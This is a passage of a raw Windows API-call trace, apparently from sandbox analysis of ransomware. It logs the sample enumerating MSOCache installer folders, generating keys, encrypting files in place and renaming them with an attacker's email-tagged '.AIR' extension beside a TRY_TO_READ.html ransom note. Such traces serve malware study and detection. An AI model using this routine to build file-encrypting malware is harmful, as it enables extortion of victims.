	[0053.728] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0053.732] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c
	[0053.732] GetProcessHeap () returned 0x540000
	[0053.732] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0053.732] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=16972987) returned 1
	[0053.732] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x102fcbb
	[0053.732] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0053.732] GetProcessHeap () returned 0x540000
	[0053.732] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0053.732] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0053.732] WriteFile (in: hFile=0x45c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0053.734] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0053.734] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0053.734] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102fcbb) returned 0x3a20020
	[0053.735] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102fcbb) returned 0x4a50020
	[0053.736] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.736] ReadFile (in: hFile=0x45c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x102fcbb, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x102fcbb, lpOverlapped=0x0) returned 1
	[0055.063] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575920
	[0055.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.063] GetLastError () returned 0x0
	[0055.063] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.064] GetLastError () returned 0x0
	[0055.064] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.064] GetLastError () returned 0x0
	[0055.064] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.064] GetLastError () returned 0x0
	[0055.064] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.064] GetLastError () returned 0x0
	[0055.064] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.064] GetLastError () returned 0x0
	[0055.064] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e53510, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0055.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0055.065] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0055.065] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0055.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0055.065] GetLastError () returned 0x0
	[0055.065] FindNextFileW (in: hFindFile=0x575920, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e53510, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0055.065] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db2e0
	[0055.065] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0055.065] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0055.065] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0055.065] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0055.065] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0055.065] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0055.065] GetProcessHeap () returned 0x540000
	[0055.065] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db388
	[0055.066] lstrcpyW (in: lpString1=0x5db388, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0055.066] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0055.066] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0055.068] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460
	[0055.068] GetProcessHeap () returned 0x540000
	[0055.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0055.068] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1886) returned 1
	[0055.068] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x75e
	[0055.068] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0055.068] GetProcessHeap () returned 0x540000
	[0055.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0055.068] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0055.068] WriteFile (in: hFile=0x460, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0055.071] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0055.072] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0055.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x75e) returned 0x5db388
	[0055.072] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x75e) returned 0x5dbaf0
	[0055.072] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0055.072] ReadFile (in: hFile=0x460, lpBuffer=0x5db388, nNumberOfBytesToRead=0x75e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db388*, lpNumberOfBytesRead=0x3a1f778*=0x75e, lpOverlapped=0x0) returned 1
	[0055.072] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1886, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0055.072] WriteFile (in: hFile=0x460, lpBuffer=0x5dbaf0*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbaf0*, lpNumberOfBytesWritten=0x3a1f778*=0x75e, lpOverlapped=0x0) returned 1
	[0055.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0055.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbaf0 | out: hHeap=0x540000) returned 1
	[0055.072] CloseHandle (hObject=0x460) returned 1
	[0055.073] GetProcessHeap () returned 0x540000
	[0055.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0055.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0055.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0055.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2e0 | out: hHeap=0x540000) returned 1
	[0055.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0055.073] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db238
	[0055.073] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0055.073] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0055.073] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0055.073] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0055.073] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", dwFileAttributes=0x80) returned 1
	[0055.083] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 73
	[0055.083] GetProcessHeap () returned 0x540000
	[0055.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db2e0
	[0055.083] lstrcpyW (in: lpString1=0x5db2e0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab"
	[0055.083] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0055.083] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0055.085] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460
	[0055.085] GetProcessHeap () returned 0x540000
	[0055.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2e0 | out: hHeap=0x540000) returned 1
	[0055.085] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=70361744) returned 1
	[0055.085] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x431a290
	[0055.085] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0055.085] GetProcessHeap () returned 0x540000
	[0055.086] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0055.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0055.086] WriteFile (in: hFile=0x460, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0055.088] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0055.088] WriteFile (in: hFile=0x460, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0055.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x431a290) returned 0x3a20020
	[0055.090] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x431a290) returned 0x7d40020
	[0055.092] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0055.092] ReadFile (in: hFile=0x460, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x431a290, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x431a290, lpOverlapped=0x0) returned 1
	[0058.070] SetFilePointer (in: hFile=0x460, lDistanceToMove=-70361744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0058.070] WriteFile (in: hFile=0x460, lpBuffer=0x7d40020*, nNumberOfBytesToWrite=0x431a290, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x7d40020*, lpNumberOfBytesWritten=0x3a1f778*=0x431a290, lpOverlapped=0x0) returned 1
	[0066.366] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20020 | out: hHeap=0x540000) returned 1
	[0066.658] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x7d40020 | out: hHeap=0x540000) returned 1
	[0066.942] CloseHandle (hObject=0x460) returned 1
	[0067.198] GetProcessHeap () returned 0x540000
	[0067.198] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0067.198] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0067.198] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0067.198] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0067.198] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0067.198] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598df8
	[0067.198] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0067.198] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0067.198] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0067.199] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0067.199] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", dwFileAttributes=0x80) returned 1
	[0067.199] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 81
	[0067.199] GetProcessHeap () returned 0x540000
	[0067.199] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x108) returned 0x5db238
	[0067.199] lstrcpyW (in: lpString1=0x5db238, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml"
